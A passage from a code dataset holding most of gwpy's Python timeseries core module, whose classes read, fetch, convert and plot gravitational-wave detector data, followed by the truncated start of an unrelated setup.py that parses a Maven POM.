pad=None,\n scaled=None, nproc=1, verbose=False, **readargs):\n \"\"\"Find and read data from frames for a channel\n\n Parameters\n ----------\n channel : `str`, `~gwpy.detector.Channel`\n the name of the channel to read, or a `Channel` object.\n\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS start time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS end time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n frametype : `str`, optional\n name of frametype in which this channel is stored, will search\n for containing frame types if necessary\n\n nproc : `int`, optional, default: `1`\n number of parallel processes to use, serial process by\n default.\n\n pad : `float`, optional\n value with which to fill gaps in the source data,\n by default gaps will result in a `ValueError`.\n\n allow_tape : `bool`, optional, default: `True`\n allow reading from frame files on (slow) magnetic tape\n\n verbose : `bool`, optional\n print verbose output about read progress, if ``verbose``\n is specified as a string, this defines the prefix for the\n progress meter\n\n **readargs\n any other keyword arguments to be passed to `.read()`\n \"\"\"\n return cls.DictClass.find(\n [channel], start, end,\n frametype=frametype,\n verbose=verbose,\n pad=pad,\n scaled=scaled,\n nproc=nproc,\n **readargs\n )[str(channel)]\n\n @classmethod\n def get(cls, channel, start, end, pad=None, scaled=None,\n dtype=None, verbose=False, allow_tape=None, **kwargs):\n \"\"\"Get data for this channel from frames or NDS\n\n This method dynamically accesses either frames on disk, or a\n remote NDS2 server to find and return data for the given interval\n\n Parameters\n ----------\n channel : `str`, `~gwpy.detector.Channel`\n the name of the channel to read, or a `Channel` object.\n\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS start time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS end time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n pad : `float`, optional\n value with which to fill gaps in the source data,\n by default gaps will result in a `ValueError`.\n\n scaled : `bool`, optional\n apply slope and bias calibration to ADC data, for non-ADC data\n this option has no effect\n\n nproc : `int`, optional, default: `1`\n number of parallel processes to use, serial process by\n default.\n\n allow_tape : `bool`, optional, default: `None`\n allow the use of frames that are held on tape, default is `None`\n to attempt to allow the `TimeSeries.fetch` method to\n intelligently select a server that doesn't use tapes for\n data storage (doesn't always work), but to eventually allow\n retrieving data from tape if required\n\n verbose : `bool`, optional\n print verbose output about data access progress, if ``verbose``\n is specified as a string, this defines the prefix for the\n progress meter\n\n **kwargs\n other keyword arguments to pass to either\n :meth:`.find` (for direct GWF file access) or\n :meth:`.fetch` for remote NDS2 access\n\n See also\n --------\n TimeSeries.fetch\n for grabbing data from a remote NDS2 server\n TimeSeries.find\n for discovering and reading data from local GWF files\n \"\"\"\n return cls.DictClass.get(\n [channel], start, end, pad=pad, scaled=scaled, dtype=dtype,\n verbose=verbose, allow_tape=allow_tape, **kwargs)[str(channel)]\n\n # -- utilities ------------------------------\n\n def plot(self, method='plot', figsize=(12, 4), xscale='auto-gps',\n **kwargs):\n \"\"\"Plot the data for this timeseries\n\n Returns\n -------\n figure : `~matplotlib.figure.Figure`\n the newly created figure, with populated Axes.\n\n See also\n --------\n matplotlib.pyplot.figure\n for documentation of keyword arguments used to create the\n figure\n matplotlib.figure.Figure.add_subplot\n for documentation of keyword arguments used to create the\n axes\n matplotlib.axes.Axes.plot\n for documentation of keyword arguments used in rendering the data\n \"\"\"\n kwargs.update(figsize=figsize, xscale=xscale)\n return super().plot(method=method, **kwargs)\n\n @classmethod\n def from_nds2_buffer(cls, buffer_, scaled=None, copy=True, **metadata):\n \"\"\"Construct a new series from an `nds2.buffer` object\n\n **Requires:** |nds2|_\n\n Parameters\n ----------\n buffer_ : `nds2.buffer`\n the input NDS2-client buffer to read\n\n scaled : `bool`, optional\n apply slope and bias calibration to ADC data, for non-ADC data\n this option has no effect\n\n copy : `bool`, optional\n if `True`, copy the contained data array to new to a new array\n\n **metadata\n any other metadata keyword arguments to pass to the `TimeSeries`\n constructor\n\n Returns\n -------\n timeseries : `TimeSeries`\n a new `TimeSeries` containing the data from the `nds2.buffer`,\n and the appropriate metadata\n \"\"\"\n # get Channel from buffer\n channel = Channel.from_nds2(buffer_.channel)\n\n # set default metadata\n metadata.setdefault('channel', channel)\n metadata.setdefault('epoch', LIGOTimeGPS(buffer_.gps_seconds,\n buffer_.gps_nanoseconds))\n metadata.setdefault('sample_rate', channel.sample_rate)\n metadata.setdefault('unit', channel.unit)\n metadata.setdefault('name', buffer_.name)\n\n # unwrap data\n scaled = _dynamic_scaled(scaled, channel.name)\n slope = buffer_.signal_slope\n offset = buffer_.signal_offset\n null_scaling = slope == 1. and offset == 0.\n if scaled and not null_scaling:\n data = buffer_.data.copy() * slope + offset\n copy = False\n else:\n data = buffer_.data\n\n # construct new TimeSeries-like object\n return cls(data, copy=copy, **metadata)\n\n @classmethod\n def from_lal(cls, lalts, copy=True):\n \"\"\"Generate a new TimeSeries from a LAL TimeSeries of any type.\n \"\"\"\n # convert the units\n from ..utils.lal import (from_lal_unit, from_lal_type)\n unit = from_lal_unit(lalts.sampleUnits)\n\n try:\n dtype = lalts.data.data.dtype\n except AttributeError: # no data\n dtype = from_lal_type(lalts)\n data = []\n else:\n data = lalts.data.data\n\n # create new series\n out = cls(\n data,\n dtype=dtype,\n name=lalts.name or None,\n unit=unit,\n t0=lalts.epoch,\n dt=lalts.deltaT,\n channel=None,\n copy=False,\n )\n\n if copy:\n return out.copy()\n return out\n\n def to_lal(self):\n \"\"\"Convert this `TimeSeries` into a LAL TimeSeries.\n\n .. note::\n\n This operation always copies data to new memory.\n \"\"\"\n import lal\n from ..utils.lal import (find_typed_function, to_lal_unit)\n\n # map unit\n try:\n unit, scale = to_lal_unit(self.unit)\n except ValueError as exc:\n warnings.warn(f\"{exc}, defaulting to lal.DimensionlessUnit\")\n unit = lal.DimensionlessUnit\n scale = 1\n\n # create TimeSeries\n create = find_typed_function(self.dtype, 'Create', 'TimeSeries')\n lalts = create(\n self.name or str(self.channel or \"\") or None,\n LIGOTimeGPS(to_gps(self.epoch.gps)),\n 0,\n self.dt.value,\n unit,\n self.shape[0],\n )\n\n # assign data\n lalts.data.data = self.value\n if scale != 1:\n lalts.data.data *= scale\n\n return lalts\n\n @classmethod\n def from_pycbc(cls, pycbcseries, copy=True):\n \"\"\"Convert a `pycbc.types.timeseries.TimeSeries` into a `TimeSeries`\n\n Parameters\n ----------\n pycbcseries : `pycbc.types.timeseries.TimeSeries`\n the input PyCBC `~pycbc.types.timeseries.TimeSeries` array\n\n copy : `bool`, optional, default: `True`\n if `True`, copy these data to a new array\n\n Returns\n -------\n timeseries : `TimeSeries`\n a GWpy version of the input timeseries\n \"\"\"\n return cls(pycbcseries.data, t0=pycbcseries.start_time,\n dt=pycbcseries.delta_t, copy=copy)\n\n def to_pycbc(self, copy=True):\n \"\"\"Convert this `TimeSeries` into a PyCBC\n `~pycbc.types.timeseries.TimeSeries`\n\n Parameters\n ----------\n copy : `bool`, optional, default: `True`\n if `True`, copy these data to a new array\n\n Returns\n -------\n timeseries : `~pycbc.types.timeseries.TimeSeries`\n a PyCBC representation of this `TimeSeries`\n \"\"\"\n from pycbc import types\n return types.TimeSeries(self.value,\n delta_t=self.dt.to('s').value,\n epoch=self.epoch.gps, copy=copy)\n\n # -- TimeSeries operations ------------------\n\n def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):\n out = super().__array_ufunc__(ufunc, method, *inputs, **kwargs)\n if out.dtype is numpy.dtype(bool) and len(inputs) == 2:\n from .statevector import StateTimeSeries\n orig, value = inputs\n try:\n op_ = _UFUNC_STRING[ufunc.__name__]\n except KeyError:\n op_ = ufunc.__name__\n out = out.view(StateTimeSeries)\n out.__metadata_finalize__(orig)\n out.override_unit('')\n oname = orig.name if isinstance(orig, type(self)) else orig\n vname = value.name if isinstance(value, type(self)) else value\n out.name = '{0!s} {1!s} {2!s}'.format(oname, op_, vname)\n return out\n\n # Quantity overrides __eq__ and __ne__ in a way that doesn't work for us,\n # so we just undo that\n def __eq__(self, other):\n return numpy.ndarray.__eq__(self, other)\n\n def __ne__(self, other):\n return numpy.ndarray.__ne__(self, other)\n\n\n# -- TimeSeriesBaseDict -------------------------------------------------------\n\ndef as_series_dict_class(seriesclass):\n \"\"\"Decorate a `dict` class to declare itself as the `DictClass` for\n its `EntryClass`\n\n This method should be used to decorate sub-classes of the\n `TimeSeriesBaseDict` to provide a reference to that class from the\n relevant subclass of `TimeSeriesBase`.\n \"\"\"\n def decorate_class(cls):\n \"\"\"Set ``cls`` as the `DictClass` attribute for this series type\n \"\"\"\n seriesclass.DictClass = cls\n return cls\n return decorate_class\n\n\n@as_series_dict_class(TimeSeriesBase)\nclass TimeSeriesBaseDict(OrderedDict):\n \"\"\"Ordered key-value mapping of named `TimeSeriesBase` objects\n\n This object is designed to hold data for many different sources (channels)\n for a single time span.\n\n The main entry points for this object are the\n :meth:`~TimeSeriesBaseDict.read` and :meth:`~TimeSeriesBaseDict.fetch`\n data access methods.\n \"\"\"\n EntryClass = TimeSeriesBase\n\n @property\n def span(self):\n \"\"\"The GPS ``[start, stop)`` extent of data in this `dict`\n\n :type: `~gwpy.segments.Segment`\n \"\"\"\n span = SegmentList()\n for value in self.values():\n span.append(value.span)\n try:\n return span.extent()\n except ValueError as exc: # empty list\n exc.args = (\n 'cannot calculate span for empty {0}'.format(\n type(self).__name__),\n )\n raise\n\n @classmethod\n def read(cls, source, *args, **kwargs):\n \"\"\"Read data for multiple channels into a `TimeSeriesDict`\n\n Parameters\n ----------\n source : `str`, `list`\n Source of data, any of the following:\n\n - `str` path of single data file,\n - `str` path of LAL-format cache file,\n - `list` of paths.\n\n channels : `~gwpy.detector.channel.ChannelList`, `list`\n a list of channels to read from the source.\n\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str` optional\n GPS start time of required data, anything parseable by\n :func:`~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`, optional\n GPS end time of required data, anything parseable by\n :func:`~gwpy.time.to_gps` is fine\n\n format : `str`, optional\n source format identifier. If not given, the format will be\n detected if possible. See below for list of acceptable\n formats.\n\n nproc : `int`, optional\n number of parallel processes to use, serial process by\n default.\n\n pad : `float`, optional\n value with which to fill gaps in the source data,\n by default gaps will result in a `ValueError`.\n\n Returns\n -------\n tsdict : `TimeSeriesDict`\n a `TimeSeriesDict` of (`channel`, `TimeSeries`) pairs. The keys\n are guaranteed to be the ordered list `channels` as given.\n\n Notes\n -----\"\"\"\n from .io.core import read as timeseries_reader\n return timeseries_reader(cls, source, *args, **kwargs)\n\n def write(self, target, *args, **kwargs):\n \"\"\"Write this `TimeSeriesDict` to a file\n\n Arguments and keywords depend on the output format, see the\n online documentation for full details for each format.\n\n Parameters\n ----------\n target : `str`\n output filename\n\n format : `str`, optional\n output format identifier. If not given, the format will be\n detected if possible. See below for list of acceptable\n formats.\n\n Notes\n -----\"\"\"\n return io_registry.write(self, target, *args, **kwargs)\n\n def __iadd__(self, other):\n return self.append(other)\n\n def copy(self):\n \"\"\"Return a copy of this dict with each value copied to new memory\n \"\"\"\n new = self.__class__()\n for key, val in self.items():\n new[key] = val.copy()\n return new\n\n def append(self, other, copy=True, **kwargs):\n \"\"\"Append the dict ``other`` to this one\n\n Parameters\n ----------\n other : `dict` of `TimeSeries`\n the container to append to this one\n\n copy : `bool`, optional\n if `True` copy data from ``other`` before storing, only\n affects those keys in ``other`` that aren't in ``self``\n\n **kwargs\n other keyword arguments to send to `TimeSeries.append`\n\n See also\n --------\n TimeSeries.append\n for details of the underlying series append operation\n \"\"\"\n for key, series in other.items():\n if key in self:\n self[key].append(series, **kwargs)\n elif copy:\n self[key] = series.copy()\n else:\n self[key] = series\n return self\n\n def prepend(self, other, **kwargs):\n \"\"\"Prepend the dict ``other`` to this one\n\n Parameters\n ----------\n other : `dict` of `TimeSeries`\n the container to prepend to this one\n\n copy : `bool`, optional\n if `True` copy data from ``other`` before storing, only\n affects those keys in ``other`` that aren't in ``self``\n\n **kwargs\n other keyword arguments to send to `TimeSeries.prepend`\n\n See also\n --------\n TimeSeries.prepend\n for details of the underlying series prepend operation\n \"\"\"\n for key, series in other.items():\n if key in self:\n self[key].prepend(series, **kwargs)\n else:\n self[key] = series\n return self\n\n def crop(self, start=None, end=None, copy=False):\n \"\"\"Crop each entry of this `dict`.\n\n This method calls the :meth:`crop` method of all entries and\n modifies this dict in place.\n\n Parameters\n ----------\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS start time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`, optional\n GPS end time of required data, defaults to end of data found;\n any input parseable by `~gwpy.time.to_gps` is fine\n\n copy : `bool`, optional, default: `False`\n If `True` copy the data for each entry to fresh memory,\n otherwise return a view.\n\n See also\n --------\n TimeSeries.crop\n for more details\n \"\"\"\n for key, val in self.items():\n self[key] = val.crop(start=start, end=end, copy=copy)\n return self\n\n def resample(self, rate, **kwargs):\n \"\"\"Resample items in this dict.\n\n This operation over-writes items inplace.\n\n Parameters\n ----------\n rate : `dict`, `float`\n either a `dict` of (channel, `float`) pairs for key-wise\n resampling, or a single float/int to resample all items.\n\n **kwargs\n other keyword arguments to pass to each item's resampling\n method.\n \"\"\"\n if not isinstance(rate, dict):\n rate = dict((c, rate) for c in self)\n for key, resamp in rate.items():\n self[key] = self[key].resample(resamp, **kwargs)\n return self\n\n @classmethod\n def fetch(cls, channels, start, end, host=None, port=None,\n verify=False, verbose=False, connection=None,\n pad=None, scaled=None, allow_tape=None, type=None,\n dtype=None):\n \"\"\"Fetch data from NDS for a number of channels.\n\n Parameters\n ----------\n channels : `list`\n required data channels.\n\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS start time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`, optional\n GPS end time of required data, defaults to end of data found;\n any input parseable by `~gwpy.time.to_gps` is fine\n\n host : `str`, optional\n URL of NDS server to use, if blank will try any server\n (in a relatively sensible order) to get the data\n\n port : `int`, optional\n port number for NDS server query, must be given with `host`.\n\n verify : `bool`, optional, default: `True`\n check channels exist in database before asking for data\n\n verbose : `bool`, optional\n print verbose output about NDS download progress, if ``verbose``\n is specified as a string, this defines the prefix for the\n progress meter\n\n connection : `nds2.connection`, optional\n open NDS connection to use.\n\n scaled : `bool`, optional\n apply slope and bias calibration to ADC data, for non-ADC data\n this option has no effect.\n\n allow_tape : `bool`, optional\n allow data access from slow tapes. If `host` or `connection` is\n given, the default is to do whatever the server default is,\n otherwise servers will be searched in logical order allowing tape\n access if necessary to retrieve the data\n\n type : `int`, `str`, optional\n NDS2 channel type integer or string name to match.\n\n dtype : `numpy.dtype`, `str`, `type`, or `dict`\n NDS2 data type to match\n\n Returns\n -------\n data : :class:`~gwpy.timeseries.TimeSeriesBaseDict`\n a new `TimeSeriesBaseDict` of (`str`, `TimeSeries`) pairs fetched\n from NDS.\n \"\"\"\n from ..io import nds2 as io_nds2\n from .io.nds2 import (print_verbose, fetch)\n\n if dtype is None:\n dtype = {}\n\n # -- open a connection ------------------\n\n # open connection to specific host\n if connection is None and host is not None:\n print_verbose(\"Opening new connection to {0}...\".format(host),\n end=' ', verbose=verbose)\n connection = io_nds2.auth_connect(host, port)\n print_verbose('connected', verbose=verbose)\n # otherwise cycle through connections in logical order\n elif connection is None:\n ifos = set([Channel(channel).ifo for channel in channels])\n if len(ifos) == 1:\n ifo = list(ifos)[0]\n else:\n ifo = None\n hostlist = io_nds2.host_resolution_order(ifo, epoch=start)\n if allow_tape is None:\n tapes = [False, True]\n else:\n tapes = [allow_tape]\n for allow_tape_ in tapes:\n error = \"\" # container for error message from cls.fetch()\n for host_, port_ in hostlist:\n try:\n return cls.fetch(channels, start, end, host=host_,\n port=port_, verbose=verbose,\n type=type, dtype=dtype, pad=pad,\n scaled=scaled, allow_tape=allow_tape_)\n except (RuntimeError, ValueError) as exc:\n error = str(exc) # need to assign to take out of scope\n msg = error.split('\\n', 1)[0]\n warnings.warn(\n f\"failed to fetch data for {', '.join(channels)} \"\n f\"in interval [{start}, {end}): {msg}\",\n io_nds2.NDSWarning,\n )\n\n # if failing occurred because of data on tape, don't try\n # reading channels individually, the same error will occur\n if not allow_tape_ and 'Requested data is on tape' in error:\n continue\n\n # if we got this far, we can't get all channels in one go\n if len(channels) > 1:\n return cls(\n (c, cls.EntryClass.fetch(c, start, end,\n verbose=verbose, type=type,\n verify=verify,\n dtype=dtype.get(c), pad=pad,\n scaled=scaled,\n allow_tape=allow_tape_))\n for c in channels)\n err = \"Cannot find all relevant data on any known server.\"\n if not verbose:\n err += (\" Try again using the verbose=True keyword argument \"\n \" to see detailed failures.\")\n raise RuntimeError(err)\n\n # -- at this point we have an open connection, so perform fetch\n\n start = to_gps(start)\n end = to_gps(end)\n istart = int(start)\n iend = int(ceil(end))\n\n return fetch(channels, istart, iend, connection=connection,\n host=host, port=port, verbose=verbose, type=type,\n dtype=dtype, pad=pad, allow_tape=allow_tape,\n scaled=scaled,\n series_class=cls.EntryClass).crop(start, end)\n\n @classmethod\n def find(cls, channels, start, end, frametype=None,\n frametype_match=None, pad=None, scaled=None, nproc=1,\n verbose=False, allow_tape=True, observatory=None, **readargs):\n \"\"\"Find and read data from frames for a number of channels.\n\n This method uses :mod:`gwdatafind` to discover the (`file://`) URLs\n that provide the requested data, then reads those files using\n :meth:`TimeSeriesDict.read()`.\n\n Parameters\n ----------\n channels : `list`\n Required data channels.\n\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS start time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS end time of required data, defaults to end of data found;\n any input parseable by `~gwpy.time.to_gps` is fine\n\n frametype : `str`\n Name of frametype in which this channel is stored; if not given\n all frametypes discoverable via GWDataFind will be searched for\n the required channels.\n\n frametype_match : `str`\n Regular expression to use for frametype matching.\n\n pad : `float`\n Value with which to fill gaps in the source data,\n by default gaps will result in a `ValueError`.\n\n scaled : `bool`\n Apply slope and bias calibration to ADC data, for non-ADC data\n this option has no effect.\n\n nproc : `int`\n Number of parallel processes to use.\n\n allow_tape : `bool`\n Allow reading from frame files on (slow) magnetic tape.\n\n verbose : `bool`, optional\n Print verbose output about read progress, if ``verbose``\n is specified as a string, this defines the prefix for the\n progress meter.\n\n readargs\n Any other keyword arguments to be passed to `.read()`.\n\n Raises\n ------\n requests.exceptions.HTTPError\n If the GWDataFind query fails for any reason.\n\n RuntimeError\n If no files are found to read, or if the read operation\n fails.\n \"\"\"\n from ..io import datafind as io_datafind\n\n start = to_gps(start)\n end = to_gps(end)\n\n # -- find frametype(s)\n\n frametypes = {}\n\n if frametype is None:\n matched = io_datafind.find_best_frametype(\n channels,\n start,\n end,\n frametype_match=frametype_match,\n allow_tape=allow_tape,\n )\n\n # flip dict to frametypes with a list of channels\n for name, ftype in matched.items():\n try:\n frametypes[ftype].append(name)\n except KeyError:\n frametypes[ftype] = [name]\n\n if verbose and len(frametypes) > 1:\n gprint(f\"Determined {len(frametypes)} frametypes to read\")\n elif verbose:\n gprint(f\"Determined best frametype as '{list(frametypes)[0]}'\")\n else: # use the given frametype for all channels\n frametypes[frametype] = channels\n\n # -- read data\n\n out = cls()\n for frametype, clist in frametypes.items():\n if verbose:\n verbose = f\"Reading '{frametype}' data\"\n\n # parse as a ChannelList\n channellist = ChannelList.from_names(*clist)\n # strip trend tags from channel names\n names = [c.name for c in channellist]\n\n # find observatory for this group\n if observatory is None:\n try:\n observatory = ''.join(\n sorted(set(c.ifo[0] for c in channellist)))\n except TypeError as exc:\n raise ValueError(\n \"Cannot parse list of IFOs from channel names\",\n ) from exc\n\n # find frames\n cache = io_datafind.find_urls(\n observatory,\n frametype,\n start,\n end,\n on_gaps=\"error\" if pad is None else \"warn\",\n )\n if not cache:\n raise RuntimeError(\n f\"No {observatory}-{frametype} URLs found for \"\n f\"[{start}, {end})\",\n )\n\n # read data\n new = cls.read(\n cache,\n names,\n start=start,\n end=end,\n pad=pad,\n scaled=scaled,\n nproc=nproc,\n verbose=verbose,\n **readargs,\n )\n\n # map back to user-given channel name and append\n out.append(type(new)(\n (key, new[chan]) for (key, chan) in zip(clist, names)\n ))\n return out\n\n @classmethod\n def get(cls, channels, start, end, pad=None, scaled=None,\n dtype=None, verbose=False, allow_tape=None, **kwargs):\n \"\"\"Retrieve data for multiple channels from frames or NDS\n\n This method dynamically accesses either frames on disk, or a\n remote NDS2 server to find and return data for the given interval\n\n Parameters\n ----------\n channels : `list`\n required data channels.\n\n start : `~gwpy.time.LIGOTimeGPS`, `float`, `str`\n GPS start time of required data,\n any input parseable by `~gwpy.time.to_gps` is fine\n\n end : `~gwpy.time.LIGOTimeGPS`, `float`, `str`, optional\n GPS end time of required data, defaults to end of data found;\n any input parseable by `~gwpy.time.to_gps` is fine\n\n frametype : `str`, optional\n name of frametype in which this channel is stored, by default\n will search for all required frame types\n\n pad : `float`, optional\n value with which to fill gaps in the source data,\n by default gaps will result in a `ValueError`.\n\n scaled : `bool`, optional\n apply slope and bias calibration to ADC data, for non-ADC data\n this option has no effect.\n\n nproc : `int`, optional, default: `1`\n number of parallel processes to use, serial process by\n default.\n\n allow_tape : `bool`, optional, default: `None`\n allow the use of frames that are held on tape, default is `None`\n to attempt to allow the `TimeSeries.fetch` method to\n intelligently select a server that doesn't use tapes for\n data storage (doesn't always work), but to eventually allow\n retrieving data from tape if required\n\n verbose : `bool`, optional\n print verbose output about data access progress, if ``verbose``\n is specified as a string, this defines the prefix for the\n progress meter\n\n **kwargs\n other keyword arguments to pass to either\n `TimeSeriesBaseDict.find` (for direct GWF file access) or\n `TimeSeriesBaseDict.fetch` for remote NDS2 access\n \"\"\"\n # separate non-None nds2-only keywords here\n nds_kw = {}\n for key in ('host', 'port', 'connection', 'type', 'dtype'):\n val = kwargs.pop(key, None)\n if val is not None:\n nds_kw[key] = val\n\n # try and find from frames\n if not nds_kw:\n if verbose:\n gprint(\"Attempting to access data from frames...\")\n try:\n return cls.find(channels, start, end, pad=pad, scaled=scaled,\n verbose=verbose,\n allow_tape=allow_tape or False,\n **kwargs)\n except (ImportError, RuntimeError, ValueError) as exc:\n if verbose:\n gprint(str(exc), file=sys.stderr)\n gprint(\"Failed to access data from frames, trying NDS...\")\n\n # remove kwargs for .find()\n for key in ('nproc', 'frametype', 'frametype_match', 'observatory'):\n kwargs.pop(key, None)\n kwargs.update(nds_kw) # replace nds keywords\n\n # otherwise fetch from NDS\n try:\n return cls.fetch(channels, start, end, pad=pad, scaled=scaled,\n dtype=dtype, allow_tape=allow_tape,\n verbose=verbose, **kwargs)\n except RuntimeError as exc:\n # if all else fails, try and get each channel individually\n if len(channels) == 1:\n raise\n else:\n if verbose:\n gprint(str(exc), file=sys.stderr)\n gprint(\"Failed to access data for all channels as a \"\n \"group, trying individually:\")\n return cls(\n (c, cls.EntryClass.get(c, start, end, pad=pad,\n scaled=scaled, dtype=dtype,\n allow_tape=allow_tape,\n verbose=verbose, **kwargs))\n for c in channels)\n\n @classmethod\n def from_nds2_buffers(cls, buffers, scaled=None, copy=True, **metadata):\n \"\"\"Construct a new dict from a list of `nds2.buffer` objects\n\n **Requires:** |nds2|_\n\n Parameters\n ----------\n buffers : `list` of `nds2.buffer`\n the input NDS2-client buffers to read\n\n scaled : `bool`, optional\n apply slope and bias calibration to ADC data, for non-ADC data\n this option has no effect.\n\n copy : `bool`, optional\n if `True`, copy the contained data array to new to a new array\n\n **metadata\n any other metadata keyword arguments to pass to the `TimeSeries`\n constructor\n\n Returns\n -------\n dict : `TimeSeriesDict`\n a new `TimeSeriesDict` containing the data from the given buffers\n \"\"\"\n tsd = cls()\n for buf in buffers:\n tsd[buf.channel.name] = tsd.EntryClass.from_nds2_buffer(\n buf, scaled=scaled, copy=copy, **metadata)\n return tsd\n\n def plot(self, label='key', method='plot', figsize=(12, 4),\n xscale='auto-gps', **kwargs):\n \"\"\"Plot the data for this `TimeSeriesBaseDict`.\n\n Parameters\n ----------\n label : `str`, optional\n labelling system to use, or fixed label for all elements\n Special values include\n\n - ``'key'``: use the key of the `TimeSeriesBaseDict`,\n - ``'name'``: use the :attr:`~TimeSeries.name` of each element\n\n If anything else, that fixed label will be used for all lines.\n\n **kwargs\n all other keyword arguments are passed to the plotter as\n appropriate\n \"\"\"\n kwargs.update({\n \"method\": method,\n \"label\": label,\n })\n\n # make plot\n from ..plot import Plot\n\n if kwargs.get(\"separate\", False):\n plot = Plot(*self.values(), **kwargs)\n else:\n plot = Plot(self.values(), **kwargs)\n\n # update labels\n artmap = {'plot': 'lines', 'scatter': 'collections'}\n artists = [x for ax in plot.axes for\n x in getattr(ax, artmap.get(method, 'lines'))]\n for key, artist in zip(self, artists):\n if label.lower() == 'name':\n lab = self[key].name\n elif label.lower() == 'key':\n lab = key\n else:\n lab = label\n artist.set_label(lab)\n\n return plot\n\n def step(self, label='key', where='post', figsize=(12, 4),\n xscale='auto-gps', **kwargs):\n \"\"\"Create a step plot of this dict.\n\n Parameters\n ----------\n label : `str`, optional\n labelling system to use, or fixed label for all elements\n Special values include\n\n - ``'key'``: use the key of the `TimeSeriesBaseDict`,\n - ``'name'``: use the :attr:`~TimeSeries.name` of each element\n\n If anything else, that fixed label will be used for all lines.\n\n **kwargs\n all other keyword arguments are passed to the plotter as\n appropriate\n \"\"\"\n kwargs.setdefault(\n \"drawstyle\",\n \"steps-{}\".format(where),\n )\n tmp = type(self)()\n for key, series in self.items():\n tmp[key] = series.append(series.value[-1:], inplace=False)\n\n return tmp.plot(label=label, figsize=figsize, xscale=xscale,\n **kwargs)\n\n\n# -- TimeSeriesBaseList -------------------------------------------------------\n\nclass TimeSeriesBaseList(list):\n \"\"\"Fancy list representing a list of `TimeSeriesBase`\n\n The `TimeSeriesBaseList` provides an easy way to collect and organise\n `TimeSeriesBase` for a single `Channel` over multiple segments.\n\n Parameters\n ----------\n *items\n any number of `TimeSeriesBase`\n\n Returns\n -------\n list\n a new `TimeSeriesBaseList`\n\n Raises\n ------\n TypeError\n if any elements are not `TimeSeriesBase`\n \"\"\"\n EntryClass = TimeSeriesBase\n\n def __init__(self, *items):\n \"\"\"Initialise a new list\n \"\"\"\n super().__init__()\n for item in items:\n self.append(item)\n\n @property\n def segments(self):\n \"\"\"The `span` of each series in this list\n \"\"\"\n from ..segments import SegmentList\n return SegmentList([item.span for item in self])\n\n def append(self, item):\n if not isinstance(item, self.EntryClass):\n raise TypeError(\"Cannot append type '%s' to %s\"\n % (type(item).__name__, type(self).__name__))\n super().append(item)\n return self\n append.__doc__ = list.append.__doc__\n\n def extend(self, item):\n item = TimeSeriesBaseList(*item)\n super().extend(item)\n extend.__doc__ = list.extend.__doc__\n\n def coalesce(self):\n \"\"\"Merge contiguous elements of this list into single objects\n\n This method implicitly sorts and potentially shortens this list.\n \"\"\"\n self.sort(key=lambda ts: ts.t0.value)\n i = j = 0\n N = len(self)\n while j < N:\n this = self[j]\n j += 1\n if j < N and this.is_contiguous(self[j]) == 1:\n while j < N and this.is_contiguous(self[j]):\n try:\n this = self[i] = this.append(self[j])\n except ValueError as exc:\n if 'cannot resize this array' in str(exc):\n this = this.copy()\n this = self[i] = this.append(self[j])\n else:\n raise\n j += 1\n else:\n self[i] = this\n i += 1\n del self[i:]\n return self\n\n def join(self, pad=None, gap=None):\n \"\"\"Concatenate all of the elements of this list into a single object\n\n Parameters\n ----------\n pad : `float`, optional\n value with which to fill gaps in the source data,\n by default gaps will result in a `ValueError`.\n\n gap : `str`, optional, default: `'raise'`\n what to do if there are gaps in the data, one of\n\n - ``'raise'`` - raise a `ValueError`\n - ``'ignore'`` - remove gap and join data\n - ``'pad'`` - pad gap with zeros\n\n If `pad` is given and is not `None`, the default is ``'pad'``,\n otherwise ``'raise'``.\n\n Returns\n -------\n series : `gwpy.types.TimeSeriesBase` subclass\n a single series containing all data from each entry in this list\n\n See also\n --------\n TimeSeries.append\n for details on how the individual series are concatenated together\n \"\"\"\n if not self:\n return self.EntryClass(numpy.empty((0,) * self.EntryClass._ndim))\n self.sort(key=lambda t: t.epoch.gps)\n out = self[0].copy()\n for series in self[1:]:\n out.append(series, gap=gap, pad=pad)\n return out\n\n def __getslice__(self, i, j):\n return type(self)(*super().__getslice__(i, j))\n\n def __getitem__(self, key):\n if isinstance(key, slice):\n return type(self)(\n *super().__getitem__(key))\n return super().__getitem__(key)\n\n def copy(self):\n \"\"\"Return a copy of this list with each element copied to new memory\n \"\"\"\n out = type(self)()\n for series in self:\n out.append(series.copy())\n return out\n","repo_name":"gwpy/gwpy","sub_path":"gwpy/timeseries/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":56118,"program_lang":"python","lang":"en","doc_type":"code","stars":358,"dataset":"github-code","pt":"3"} +{"seq_id":"10467737610","text":"from setuptools import setup, find_packages\nimport xml.dom, xml.dom.minidom\nimport os.path\n\n# Maven 2\n# -------\n# \n# This is a lonely Python project living in a hostile Java world, so we have to get\n# project metadata from a Maven 2 POM_ living alongside setup.py\n#\n# .. _POM: http://maven.apache.org/pom.html\n\ndef _text(node):\n a = []\n _text0(node, a)\n return u''.join(a)\ndef _text0(node, a):\n if node.nodeType in (xml.dom.Node.CDATA_SECTION_NODE, xml.dom.Node.TEXT_NODE):\n a.append(node.nodeValue)\n for child in node.childNodes:\n _text0(child, a)\ndef _valueFor(nodeName, parentName, doc):\n return [_text(i) for i in pomDoc.getElementsByTagName(nodeName) if i.parentNode.nodeName == parentName][0]\npomDoc = 